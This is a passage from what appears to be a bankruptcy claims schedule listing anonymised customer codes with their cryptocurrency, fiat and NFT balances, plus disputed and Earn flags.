| 07349498 | | NFT (295578698200781935/Coachella x FTX Weekend 1 #19594)[1], NFT (315210723435990826/Coachella x FTX Weekend 2 #26209)[1], USD[10.00] | | |
| 07349499 | | ETH[.00117799], ETHW[.00117799], USD[0.00] | | |
| 07349500 | | USD[11.09] | Yes | |
| 07349501 | | CUSDT[1], ETH[0], LTC[0], USD[0.00], USDT[0] | | |
| 07349502 | | USD[0.01] | Yes | |
| 07349504 | | USD[10.00] | | |
| 07349505 | | BRZ[1], CUSDT[4], DOGE[1], TRX[1], USD[0.00] | | |
| 07349506 | | USD[1754.08] | | |
| 07349507 | | BAT[0], BRZ[0], BTC[0], CUSDT[4], TRX[3], USD[0.00] | Yes | |
| 07349508 | | BAT[26.43315521], DOGE[171.61147867], GRT[2.64515681], SOL[.16591963], TRX[.79335925], USD[-7.66] | | |
| 07349509 | | DOGE[10.03048364], USD[0.00] | | |
| 07349510 | | BTC[.12886323], DOGE[0], MATIC[0], SHIB[0], SOL[0.00004081], TRX[0], USD[-500.00], USDT[0] | Yes | |
| 07349512 | | USD[10.00] | | |
| 07349513 | | USD[0.00], USDT[0] | | |
| 07349514 | | CUSDT[1], DOGE[4508.51139754], LINK[4.99899989], TRX[1], USD[352.15] | | |
| 07349515 | | BRZ[0], DOGE[0.00003998], GRT[0], LINK[0], LTC[0], USD[0.00], USDT[0] | | |
| 07349516 | | USD[10.00] | | |
| 07349519 | | BAT[154.79909617], BRZ[4], CUSDT[10], GRT[18.8851001], SOL[8.68731833], TRX[15], USD[0.00] | | |
| 07349520 | | BTC[0], DAI[0], DOGE[0.00003892], ETH[0], GRT[0], SHIB[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07349521 | | ALGO[58.10838643], AUD[72.12], BAT[1.00105968], BRZ[786.16737434], CUSDT[30619.27436819], DOGE[3353.20346044], ETH[.02010677], ETHW[14.52966556], GRT[119.98353287], LINK[.00004579], LTC[.00000146], MATIC[13.11594754], MKR[.10875842], NEAR[.5143457], SHIB[9], TRX[62.92440499], UNI[6.1536465], USD[0.00], USDT[121.23902291] | Yes | |
| 07349522 | | USD[10.00] | | |
| 07349523 | | DOGE[4], GRT[3.68834023], SUSHI[.00078231], TRX[.00004833], USD[0.00] | | |
| 07349524 | | DOGE[31628.43528102], USD[0.00], USDT[0.00000001] | Yes | |
| 07349525 | | USD[10.00] | | |
| 07349526 | | DOGE[7400.04793686], USD[0.00] | | |
| 07349527 | | CUSDT[12], TRX[2], USD[0.00] | Yes | |
| 07349528 | | USD[10.00] | | |
| 07349529 | | USD[10.00] | | |
| 07349530 | | USD[10.00] | | |
| 07349531 | | BRZ[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07349532 | | USD[0.01] | | |
| 07349533 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349534 | | BTC[0], DOGE[0], ETH[0], SUSHI[0], USD[0.00] | | |
| 07349535 | | USD[10.00] | | |
| 07349536 | | USD[10.00] | | |
| 07349537 | | CUSDT[1], DOGE[20.17831815], LTC[.07751021], USD[0.00] | | |
| 07349538 | | DOGE[38.22729055], USD[0.00] | | |
| 07349539 | | BAT[1], DOGE[.00004536], USD[0.22] | | |
| 07349540 | | USD[10.00] | | |
| 07349541 | | DOGE[1.00000344], USD[0.01] | | |
| 07349542 | | CUSDT[2], DOGE[1100.8857579], USD[0.00] | | |
| 07349543 | | USD[0.01], USDT[0] | Yes | |
| 07349544 | | BAT[1], BRZ[1], DOGE[4], ETH[.14330501], ETHW[.14330501], GRT[87.22966817], SOL[45.29974211], TRX[3], USD[0.00], USDT[0] | | |
| 07349546 | | CUSDT[1], DOGE[2134.42093906], USD[0.00] | | |
| 07349549 | | USD[10.00] | | |
| 07349550 | | USD[10.00] | | |
| 07349551 | | USD[11.05] | Yes | |
| 07349552 | | SUSHI[38.96295], USD[2.75] | | |
| 07349553 | | USD[10.00] | | |
| 07349554 | | BCH[.00120514], BRZ[11.96197498], BTC[.00053934], CUSDT[27], DOGE[1.8652608], GRT[2.03097997], LTC[.0083499], SOL[.07098868], TRX[12.00087675], USD[0.00], USDT[1.0778493] | Yes | |
| 07349555 | | CUSDT[3], SOL[.25436742], USD[0.00] | Yes | |
| 07349556 | | USD[10.00] | | |
| 07349557 | | USD[10.00] | | |
| 07349558 | | CUSDT[21.79996406], DOGE[309.89231549], ETH[.00604957], ETHW[.00597661], USD[136.92] | Yes | |
| 07349559 | | USD[10.00] | | |
| 07349560 | | DOGE[1], ETH[.0055283], ETHW[.0055283], USD[0.00], USDT[99.49044971] | | |
| 07349561 | | USD[10.00] | | |
| 07349562 | | USD[10.00] | | |
| 07349563 | | BRZ[3], BTC[.00770139], CUSDT[6], DOGE[1.0064517], ETH[.03783111], ETHW[.03736412], GRT[53.97703051], LINK[5.37465794], SOL[1.53494834], TRX[5620.84776224], USD[0.00] | Yes | |
| 07349564 | | BAT[.00960829], CUSDT[3], DOGE[1.85335766], ETH[.0000731], ETHW[.0000731], GRT[.07647549], TRX[.7756371], USD[0.85] | Yes | |
| 07349565 | | BAT[2.12501109], CUSDT[1], DOGE[.06573026], TRX[1], USD[4.71] | Yes | |
| 07349566 | | CUSDT[1], DOGE[39.55883401], USD[0.69] | | |
| 07349567 | | BAT[1], CUSDT[5], DOGE[1897.26025354], GRT[1], TRX[2], USD[500.35], USDT[2] | | |
| 07349568 | | USD[10.00] | | |
| 07349569 | | AAVE[.39184062], BRZ[1], CUSDT[1], DOGE[11.69263699], NFT [296810224410323629/Digital Z #9][1], NFT [426352195291993843/Vox World #14][1], NFT [431874753976850318/Entrance Voucher #2897][1], SHIB[4], TRX[5], USD[0.00] | Yes | |
| 07349571 | | DOGE[1], ETH[0.01147276], ETHW[0.01147276], USD[0.00] | | |
| 07349572 | | CUSDT[2], DOGE[1295.90788509], ETH[.01717792], ETHW[.01717792], USD[0.00] | | |
| 07349573 | | BTC[0], DOGE[69.63826192], UNI[0], USD[0.00], USDT[0.00043723] | | |
| 07349574 | | DOGE[1], USD[0.01] | | |
| 07349575 | | USD[10.00] | | |
| 07349577 | | CUSDT[13], TRX[1], USD[0.00] | | |
| 07349578 | | USD[10.00] | | |
| 07349579 | | SUSHI[.6631112], USD[0.00] | | |
| 07349581 | | USD[10.00] | | |
| 07349583 | | TRX[212.8431244], USD[0.00] | | |
| 07349584 | | USD[10.00] | | |
| 07349585 | | BRZ[4], CUSDT[2], DOGE[.00028406], SUSHI[.00003274], TRX[2], USD[0.00] | | |
| 07349586 | | USD[0.03] | Yes | |
| 07349587 | | USD[10.00] | | |
| 07349588 | | CUSDT[8], DOGE[179.38567584], TRX[107.39710346], USD[0.01] | Yes | |
| 07349589 | | USD[10.00] | | |
| 07349590 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07349591 | | DOGE[138.20767859], USD[0.00] | | |
| 07349592 | | USD[10.00] | | |
| 07349593 | | USD[10.00] | | |
| 07349594 | | BRZ[1], DOGE[4938.833222], USD[0.00] | | |
| 07349595 | | DOGE[41.98218376], USD[0.00] | | |
| 07349596 | | USD[10.68] | Yes | |
| 07349598 | | USD[10.00] | | |
| 07349600 | | BRZ[3.68348993], CAD[0.63], CUSDT[96.66650413], DAI[.99074378], PAXG[.00053907], SGD[0.66], USD[2.56], USDT[.99331536], YFI[.00008535] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349601 | | USD[0.01] | | |
| 07349602 | | BTC[.00021164], CUSDT[2], DOGE[2037.64485092], TRX[2], USD[0.00] | | |
| 07349603 | | USD[0.00] | | |
| 07349604 | | AUD[1.38], BRZ[2], CUSDT[2], TRX[4], USD[7.91] | | |
| 07349605 | | USD[0.06] | | |
| 07349606 | | TRX[208.38812204], USD[0.00] | | |
| 07349607 | | BRZ[1], USD[11.63] | Yes | |
| 07349608 | | USD[0.00] | | |
| 07349609 | | USD[10.00] | | |
| 07349610 | | DOGE[178.04363683], USD[0.00] | | |
| 07349611 | Contingent, Disputed | CUSDT[7], TRX[2], USD[0.00] | | |
| 07349613 | | USD[10.00] | | |
| 07349614 | | BTC[.07302183], CUSDT[1], DOGE[382.22862122], ETH[.27340162], ETHW[.27320912], SHIB[1], USD[1965.26] | Yes | |
| 07349615 | | USD[10.00] | | |
| 07349616 | | GRT[4.91030951], USD[0.00] | | |
| 07349617 | | USD[10.00] | | |
| 07349618 | | BCH[.1083807], BRZ[2], BTC[.0015668], DOGE[1595.90202856], ETH[.03114383], ETHW[.03114383], LTC[.32841638], USD[0.00] | | |
| 07349620 | | USD[0.01] | | |
| 07349621 | | USD[10.00] | | |
| 07349622 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07349623 | | USD[10.00] | | |
| 07349624 | | AAVE[0], BAT[0], BCH[0], BRZ[1], BTC[0.00000002], CUSDT[17], DAI[0], DOGE[1], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SHIB[0], SOL[0], TRX[2], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07349625 | | USD[10.00] | | |
| 07349626 | | CUSDT[7], DOGE[0], TRX[4], USD[0.00], USDT[0] | | |
| 07349627 | | USD[0.00] | | |
| 07349628 | | SHIB[3], USD[15.63], USDT[0] | | |
| 07349629 | | BRZ[1], TRX[429.05296083], USD[0.00] | | |
| 07349630 | | LINK[0], SOL[0], USD[0.00] | | |
| 07349631 | | BAT[1], CUSDT[7], GRT[2], LINK[.0008725], SHIB[24], TRX[10], USD[155.65] | Yes | |
| 07349632 | | USD[0.01] | Yes | |
| 07349633 | | USD[10.00] | | |
| 07349634 | | BTC[.00883682], DOGE[5615.83846273], SOL[1.05814178], USD[0.00], USDT[0] | | |
| 07349635 | | BRZ[4], CUSDT[5], DOGE[603.27062944], SHIB[253.23023485], SOL[0], TRX[3], USD[0.00], USDT[0.00000001] | Yes | |
| 07349636 | | BRZ[1], CUSDT[2], ETH[0.00088580], ETHW[0.00088580], TRX[2], USD[10.00], USDT[0] | | |
| 07349637 | | USD[10.00] | | |
| 07349638 | | DOGE[.08540487], LTC[0], USD[0.00] | Yes | |
| 07349639 | | BAT[1], TRX[1], USD[0.01] | | |
| 07349640 | | USD[10.00] | | |
| 07349641 | | USD[10.00] | | |
| 07349642 | | BTC[0], ETH[0], SOL[0.00000001], USD[0.17] | | |
| 07349644 | | BAT[1], BRZ[2], BTC[0.00330309], CUSDT[4], TRX[3], USD[0.24] | | |
| 07349645 | | USD[8.37] | | |
| 07349646 | | USD[10.00] | | |
| 07349647 | | USD[10.00] | | |
| 07349648 | | DOGE[1], USD[0.00] | | |
| 07349649 | | USD[1.93] | | |
| 07349650 | | USD[10.00] | | |
| 07349651 | | USD[10.00] | | |
| 07349652 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07349653 | | CUSDT[2], DOGE[0], USD[0.01] | | |
| 07349654 | | USD[10.00] | | |
| 07349655 | | SOL[.00001855], TRX[1], USD[0.01] | Yes | |
| 07349656 | | BTC[0.00001258], DOGE[0], USD[0.00] | | |
| 07349657 | | PAXG[.00561668], USD[0.00] | Yes | |
| 07349658 | | BAT[1.01655549], CUSDT[1033.89776672], USD[0.00] | Yes | |
| 07349659 | | BTC[.00002004], USD[0.28] | | |
| 07349661 | | USD[10.00] | | |
| 07349662 | | BTC[.00012081], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349663 | | USD[10.00] | | |
| 07349664 | | USD[10.00] | | |
| 07349665 | | SUSHI[6.87884511], TRX[1], USD[0.02] | Yes | |
| 07349666 | | USD[10.00] | | |
| 07349667 | | USD[0.00] | | |
| 07349668 | | CUSDT[1], DOGE[4], TRX[4], USD[0.00] | | |
| 07349669 | | BTC[0.00003127], ETH[.00030087], ETHW[.00030087], USD[0.00] | | |
| 07349670 | | BRZ[1], BTC[.04365061], CUSDT[4], ETH[.74722821], ETHW[.74690767], MATIC[71.13656891], SHIB[2], TRX[.03394515], USD[0.00] | Yes | |
| 07349672 | | USD[10.00] | | |
| 07349673 | | CUSDT[2], USD[0.00] | | |
| 07349674 | | BTC[.00241782], CUSDT[6.00069941], DOGE[639.62681929], ETH[.10134654], ETHW[.10030539], SUSHI[2.93877235], TRX[9.23665625], USD[0.00] | Yes | |
| 07349675 | | BRZ[1], USD[6], USD[0.01], USDT[0] | Yes | |
| 07349677 | | CUSDT[8], DOGE[2.1912588], NFT (30783978315045686/Entrance Voucher #2178)[1], SOL[37.84486059], TRX[3.01884661], UNI[5.98102462], USD[0.06], USDT[.8941114] | Yes | |
| 07349678 | | USD[10.00] | | |
| 07349680 | | USD[10.00] | | |
| 07349681 | | USD[0.12] | | |
| 07349683 | | DOGE[25.50223918], USD[0.00] | | |
| 07349684 | | USD[0.00] | | |
| 07349685 | | BAT[1.01098217], BRZ[2], BTC[.00019301], CUSDT[8], DOGE[0.10251735], ETH[.00527509], ETHW[.00520669], SHIB[2], SOL[6.14304399], TRX[1.01505821], USD[0.00] | Yes | |
| 07349686 | | BTC[0], ETH[.00000002], ETHW[0.15228628], USD[2672.98] | | |
| 07349687 | | BTC[.01] | | |
| 07349688 | | USD[10.00] | | |
| 07349690 | | DOGE[663.17294036], USD[10.00] | | |
| 07349691 | | BAT[2.09108081], BRZ[2], BTC[0], CUSDT[5], DOGE[2], ETH[0], GRT[2.03499104], NFT (295124839134831674/Aku World: Dream #205)[1], SOL[0], TRX[7], USD[0.00], USDT[1.09069056] | Yes | |
| 07349692 | | USD[10.00] | | |
| 07349693 | | USD[0.01] | | |
| 07349694 | | USD[0.01], USDT[0] | | |
| 07349695 | | USD[10.00] | | |
| 07349696 | | SOL[.67440156], USD[0.00] | | |
| 07349697 | | USD[10.00] | | |
| 07349698 | | USD[0.76] | | |
| 07349699 | | USD[10.00] | | |
| 07349700 | | USD[10.00] | | |
| 07349701 | | BAT[5.32956294], CUSDT[9], DAI[.5865748], DOGE[25.26026961], GRT[8.65973689], SHIB[1], SOL[.07838571], SUSHI[.01876641], TRX[5.76382627], USD[0.18] | Yes | |
| 07349702 | | DOGE[4870.71657974], SHIB[14625657.11406826], USD[393.12], USDT[0] | | |
| 07349703 | | AVAX[.06673595], BTC[.008098], CUSDT[983.89311201], DOGE[92.6578498], ETH[.05903578], ETHW[.05830235], SHIB[2124891.91512651], SOL[.15766081], TRX[85.58073041], USD[56.59] | Yes | |
| 07349704 | | USD[10.00] | | |
| 07349705 | | USD[0.00] | | |
| 07349706 | | USD[10.00] | | |
| 07349708 | | BRZ[1], DOGE[3.01351233], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07349709 | | USD[10.00] | | |
| 07349711 | | BRZ[2], USD[0.00] | | |
| 07349713 | | USD[10.00] | | |
| 07349714 | | TRX[1], UNI[26.58853631], USD[10.00] | | |
| 07349715 | | CUSDT[2], TRX[1], USD[10.00] | | |
| 07349716 | | BRZ[1], USD[0.00] | | |
| 07349717 | | USD[10.00] | | |
| 07349718 | | BRZ[1], DOGE[21403.01380413], USD[3.52], USDT[1.08688369] | Yes | |
| 07349719 | | BRZ[0], USD[0.01] | | |
| 07349720 | | BF_POINT[300], NFT (551691621987490635/Coachella x FTX Weekend 2 #8217)[1], USD[11.11] | Yes | |
| 07349721 | | CUSDT[1], USD[30.33] | | |
| 07349722 | | SHIB[106449.02477414], USD[0.00] | Yes | |
| 07349723 | | USD[10.00] | | |
| 07349724 | | CUSDT[1], USD[0.00] | | |
| 07349726 | | USD[10.00] | | |
| 07349728 | | USD[10.00] | | |
| 07349729 | | USD[10.00] | | |
| 07349730 | | DOGE[31.84707729], USD[0.02] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349731 | | CUSDT[1], LINK[.29996355], USD[0.00] | | |
| 07349734 | | USD[10.00] | | |
| 07349735 | | BCH[0], BTC[0], CUSDT[0], DOGE[0], ETH[0.00108733], ETHW[0.00107365], GRT[0], LTC[0], MKR[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00002428] | Yes | |
| 07349736 | | USD[10.00] | | |
| 07349737 | | USD[10.00] | | |
| 07349738 | | USD[10.00] | | |
| 07349740 | | DOGE[0], SHIB[11], TRX[1], UNI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07349741 | | USD[0.00] | | |
| 07349742 | | CUSDT[3], DOGE[110.13295632], TRX[1], USD[0.01] | Yes | |
| 07349743 | | DOGE[21.27848138], USD[0.00] | | |
| 07349744 | | USD[9.51] | | |
| 07349745 | | CUSDT[1], DOGE[0], ETH[0], GRT[0], USD[0.01] | | |
| 07349746 | | DOGE[30.06766306], USD[0.00] | | |
| 07349748 | | DOGE[0], ETH[0.00382332], ETHW[0.00378228], GBP[0.00], GRT[0], KSHIB[0], LINK[1.38731067], MATIC[0], MKR[0], SHIB[687287.64127546], TRX[0.00091947], USD[0.00], YFI[0] | Yes | |
| 07349750 | | USD[10.00] | | |
| 07349751 | | BAT[1.0165555], CUSDT[2], GRT[1.00498957], TRX[2], USD[0.00], USDT[1.09102069] | Yes | |
| 07349752 | | BRZ[1], CUSDT[14], DOGE[2030.02337464], ETH[4.87403077], ETHW[0], GRT[2], MATIC[840.80706112], SHIB[16], TRX[9], USD[406.09], USDT[0.00000001] | Yes | |
| 07349753 | | USD[10.00] | | |
| 07349754 | | DOGE[1], USD[0.00], USDT[1] | | |
| 07349755 | | BRZ[1], CUSDT[5], DOGE[1], ETH[0], MATIC[0], SOL[0], USD[0.00] | Yes | |
| 07349756 | | CUSDT[1], DOGE[1], GRT[0], TRX[2], USD[0.01] | Yes | |
| 07349757 | | USD[10.90] | Yes | |
| 07349759 | | USD[10.00] | | |
| 07349760 | | USD[10.00] | | |
| 07349761 | | TRX[2], USD[0.00] | | |
| 07349762 | | BRZ[1], CUSDT[16], DOGE[1273.48797461], GRT[1.0050394], KSHIB[293.45297606], SOL[.5943343], SUSHI[1.25468948], TRX[180.63745575], USD[0.00], YFI[.00006014] | Yes | |
| 07349763 | | USD[10.00] | | |
| 07349765 | | USD[10.00] | | |
| 07349766 | | BRZ[1], DOGE[11608.71723139], LINK[18.61405177], TRX[1], USD[0.01] | Yes | |
| 07349767 | | BRZ[1], CUSDT[8], USD[0.00] | | |
| 07349768 | | USD[0.01] | | |
| 07349769 | | BAT[874.86236044], CUSDT[1], DOGE[4833.63728824], GRT[1.00498957], LINK[1.10445398], TRX[1], USD[0.00] | Yes | |
| 07349771 | | BAT[0], DOGE[8.36121092], MATIC[0], SOL[0], USD[0.00], USDT[0.00000001] | | |
| 07349772 | | USD[10.00] | | |
| 07349774 | | USD[10.00] | | |
| 07349775 | | DOGE[.81420852], TRX[1], USD[0.00] | Yes | |
| 07349776 | | DOGE[134.30832221], USD[0.00] | | |
| 07349777 | | USD[10.00] | | |
| 07349778 | | USD[10.00] | | |
| 07349779 | | BTC[.00010506], DOGE[382.47280499], TRX[1], USD[10.29] | | |
| 07349780 | | USD[10.00] | | |
| 07349781 | | USD[10.00] | | |
| 07349782 | | DOGE[12311.01392844], TRX[1], USD[0.00] | Yes | |
| 07349783 | | CUSDT[1], DOGE[.00008162], USD[0.74] | | |
| 07349784 | | USD[10.00] | | |
| 07349786 | | BRZ[2], CUSDT[8], TRX[1], USD[0.00] | | |
| 07349787 | | USD[70.00] | | |
| 07349788 | | BAT[0], CUSDT[4], DOGE[213.97424169], SUSHI[1.94842455], TRX[234.31998894], USD[0.00] | Yes | |
| 07349789 | | BTC[.00296897], DOGE[.00002511], ETH[.00857386], ETHW[.00846434], SHIB[248295.56575915], USD[0.00], USDT[0] | Yes | |
| 07349790 | | BAT[1], BTC[.00042907], CUSDT[1], DOGE[20951.27442308], USD[0.00] | | |
| 07349791 | | BRZ[3], CUSDT[36], DOGE[2], ETH[.00000001], ETHW[0], USD[0.00], USDT[0] | | |
| 07349792 | | USD[59.46], USDT[0.00000001] | Yes | |
| 07349794 | | USD[0.00], USDT[0] | Yes | |
| 07349795 | | USD[0.00] | | |
| 07349797 | | USD[10.00] | | |
| 07349799 | | BRZ[1], CUSDT[2], DOGE[1], ETH[0], USD[0.00] | | |
| 07349800 | | SUSHI[.72706272], USD[0.00] | Yes | |
| 07349801 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349802 | | USD[10.00] | | |
| 07349803 | | DOGE[15.5267167], USD[0.74] | | |
| 07349804 | | USD[0.00] | | |
| 07349805 | | USD[10.00] | | |
| 07349806 | | USD[10.00] | | |
| 07349807 | | DOGE[784.9635092], USD[0.00] | | |
| 07349808 | | USD[10.00] | | |
| 07349809 | | USD[10.00] | | |
| 07349810 | | USD[10.00] | | |
| 07349811 | | USD[10.00] | | |
| 07349812 | | USD[10.00] | | |
| 07349813 | | BRZ[1], CUSDT[4], DOGE[3], ETH[.00100041], ETHW[.00100041], GRT[56.97341139], TRX[20.19624122], USD[0.50] | | |
| 07349814 | | USD[10.00] | | |
| 07349815 | | BRZ[1], DOGE[3], SOL[0], TRX[1], USD[0.00] | | |
| 07349817 | | USD[10.00] | | |
| 07349820 | | CUSDT[6], DOGE[48.66629534], USD[0.00] | | |
| 07349821 | | BTC[.00000857], DOGE[16.59775658], USD[0.00] | | |
| 07349822 | | USD[10.00] | | |
| 07349823 | | USD[10.00] | | |
| 07349824 | | USD[10.00] | | |
| 07349825 | | CUSDT[1], DOGE[1441.29992136], USD[0.00] | Yes | |
| 07349826 | | USD[10.00] | | |
| 07349827 | | BAT[3], BRZ[2], CUSDT[7], DOGE[1], TRX[7], USD[0.01], USDT[3] | | |
| 07349828 | | USD[0.00] | | |
| 07349829 | | USD[10.00] | | |
| 07349830 | | USD[10.00] | | |
| 07349831 | | USD[10.00] | | |
| 07349833 | | USD[10.00] | | |
| 07349834 | | USD[10.00] | | |
| 07349835 | | DOGE[2], SOL[16.95343322], TRX[1], USD[0.00] | | |
| 07349836 | | USD[10.00] | | |
| 07349837 | | USD[10.00] | | |
| 07349838 | | DOGE[1], SHIB[1], USD[0.01], USDT[0] | Yes | |
| 07349839 | | CUSDT[4], GRT[1], USD[0.00] | | |
| 07349840 | | USD[10.00] | | |
| 07349841 | | CUSDT[433.08599723], TRX[29.94163606], USD[0.00] | | |
| 07349842 | | DAI[0], DOGE[0], ETH[0], ETHW[0], GRT[0], TRX[0], USD[0.00] | | |
| 07349843 | | SHIB[1], SOL[1.15269831], USD[0.00], USDT[0] | Yes | |
| 07349844 | | USD[10.00] | | |
| 07349845 | | USD[10.00] | | |
| 07349846 | | USD[10.00] | | |
| 07349847 | | USD[10.00] | | |
| 07349848 | | BAT[1], BRZ[1], CUSDT[3], USD[0.00] | | |
| 07349849 | | USD[10.00] | | |
| 07349850 | | DOGE[1], USD[0.04] | | |
| 07349851 | | USD[10.00] | | |
| 07349852 | | DOGE[157.9232212], USD[0.00] | | |
| 07349853 | | USD[10.00] | | |
| 07349854 | | BAT[.00004299], CUSDT[4], DOGE[106.69643716], LTC[.00043653], SOL[.00079447], TRX[7], USD[0.16] | | |
| 07349855 | | DOGE[137.38484917], USD[0.00] | | |
| 07349856 | | USD[10.00] | | |
| 07349857 | | TRX[1.26964739], USD[0.00] | | |
| 07349858 | | USD[0.00] | | |
| 07349859 | | USD[10.00] | | |
| 07349860 | | USD[0.01] | | |
| 07349861 | | USD[10.00] | | |
| 07349862 | | BRZ[0.00139686], ETH[0], USD[10.00], USDT[0.00016115] | | |
| 07349863 | | SHIB[2], SOL[1.04070921], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349864 | | BRZ[10.93868272], CUSDT[10], GRT[1.00017432], LINK[.00228405], MATIC[.00545932], TRX[17.03682085], USD[0.02] | Yes | |
| 07349865 | | USD[10.00] | | |
| 07349866 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07349867 | | USD[0.00] | | |
| 07349868 | | BTC[.00011125], DOGE[224.84796591], ETH[.01300693], ETHW[.01284277], GRT[.03640523], TRX[141.75233655], USD[-14.99] | Yes | |
| 07349870 | | DOGE[31.02854346], USD[0.00] | | |
| 07349871 | | USD[10.00] | | |
| 07349872 | | USD[10.00] | | |
| 07349874 | | DOGE[1], USD[.01], USDT[0.00000001] | | |
| 07349875 | Contingent, Disputed | CUSDT[21.61956157], USD[0.01] | | |
| 07349876 | | USD[0.03] | | |
| 07349877 | | BTC[.0006443], CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07349878 | | CUSDT[4], DOGE[0], USD[0.31] | | |
| 07349879 | | CUSDT[1], DOGE[1.39069983], USD[0.00] | | |
| 07349880 | | CUSDT[1], DOGE[.50947427], TRX[150.64080922], USD[0.00] | | |
| 07349881 | | USD[0.00] | | |
| 07349882 | | BRZ[2], CUSDT[5], DOGE[0.25763340], TRX[412.6172252], USD[0.00], USDT[9.81434251] | | |
| 07349883 | | USD[0.01], USDT[0.00000001] | | |
| 07349884 | | USD[10.00] | | |
| 07349885 | | BRZ[0.00000001], GRT[0], USD[156.87] | Yes | |
| 07349886 | | USD[10.00] | | |
| 07349887 | | SOL[0], USD[33.36] | Yes | |
| 07349888 | | CUSDT[3], DOGE[358.17164204], GRT[1], TRX[1], USD[0.05] | | |
| 07349889 | | CUSDT[1], ETH[0.00260535], ETHW[0.00260535], USD[0.00] | | |
| 07349890 | | USD[0.00] | | |
| 07349891 | | BRZ[1], ETH[0], GRT[1.00404471], TRX[2], USD[11.08], YFI[0] | Yes | |
| 07349892 | | BRZ[1], CUSDT[6], DOGE[7], TRX[4], USD[0.00], USDT[1] | | |
| 07349893 | | USD[0.00] | | Yes | |
| 07349894 | | USD[10.00] | | |
| 07349895 | | BTC[0], DOGE[5], GRT[324.28293817], SOL[0], SUSHI[0], TRX[1], USD[10.72] | Yes | |
| 07349896 | | USD[0.01] | Yes | |
| 07349897 | | BRZ[1], DOGE[.00001326], GRT[1], TRX[21462.33744034], USD[68.13] | | |
| 07349898 | | USD[10.00] | | |
| 07349900 | | BRZ[2], CUSDT[1], DOGE[26217.92947376], GRT[6.10968659], TRX[1], USD[0.00] | Yes | |
| 07349901 | | CUSDT[2], DOGE[85.12625384], USD[0.00] | | |
| 07349902 | | DOGE[1694.06422624], USD[65.20] | Yes | |
| 07349903 | | USD[10.00] | | |
| 07349904 | | DOGE[1.02905023], TRX[1], USD[0.00] | | |
| 07349905 | | USD[10.00] | | |
| 07349906 | | BTC[0], SOL[0], USD[0.00] | | |
| 07349907 | | BTC[0], CUSDT[1], DOGE[1], ETH[0], ETHW[0], GRT[0], LINK[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07349908 | | CUSDT[1], DOGE[.25202919], TRX[.00000116], USD[0.00] | | |
| 07349909 | | USD[10.00] | | |
| 07349910 | | BF_POINT[200], BRZ[4], CUSDT[80.05581738], DOGE[5014.47824242], SHIB[1040227.1131226], USD[0.00] | Yes | |
| 07349911 | | USD[10.00] | | |
| 07349912 | | BAT[1], BRZ[7], BTC[0], CUSDT[2], DOGE[0], ETH[0], GRT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07349913 | | USD[10.00] | | |
| 07349914 | | USD[10.00] | | |
| 07349917 | | BRZ[1], BTC[0], CUSDT[3], DOGE[.54849022], ETH[.01026153], ETHW[.01026153], GRT[60.63126274], SOL[3.39775051], USD[13.51] | | |
| 07349918 | | CUSDT[1], USD[10.00] | | |
| 07349919 | | USD[10.00] | | |
| 07349920 | | BRZ[1], CUSDT[2], ETH[0], TRX[1], USD[0.19], USDT[0.00937669] | | |
| 07349922 | | CUSDT[1], SHIB[1], USD[0.00] | | |
| 07349923 | | SOL[.03953128], USD[0.00] | | |
| 07349924 | | ALGO[157.19411149], LINK[0], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07349925 | | BRZ[2], CUSDT[2], TRX[3], USD[0.00], USDT[1] | | |
| 07349926 | | USD[10.00] | | |
| 07349928 | | DOGE[.00000862], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07349929 | | BAT[1], ETH[.00904203], ETHW[.00754609], MATIC[45.27047406], SHIB[2400125.96432102], TRX[206.81619293], USD[0.00], USDT[0] | | |
| 07349931 | | CUSDT[4], DOGE[727.9465477], SHIB[303278.24304694], TRX[117.80055233], USD[0.16] | Yes | |
| 07349933 | | USD[10.00] | | |
| 07349934 | | BTC[.00018236], USD[0.00] | | |
| 07349935 | | USD[10.00] | | |
| 07349936 | | USD[510.00] | | |
| 07349937 | | CUSDT[2], DOGE[3255.097942], KSHIB[1666.65185198], SHIB[1], USD[5.00] | | |
| 07349938 | | USD[0.26], USDT[0] | | |
| 07349939 | | BRZ[2], CUSDT[1], DOGE[.00000006], TRX[1], USD[0.00] | | |
| 07349940 | | BAT[3], BRZ[1], BTC[.000738], CUSDT[7], DOGE[27167.92230422], GRT[1], SUSHI[49.01763995], TRX[5], USD[3026.95], USDT[1] | | |
| 07349941 | | USD[10.00] | | |
| 07349942 | | USD[10.00] | | |
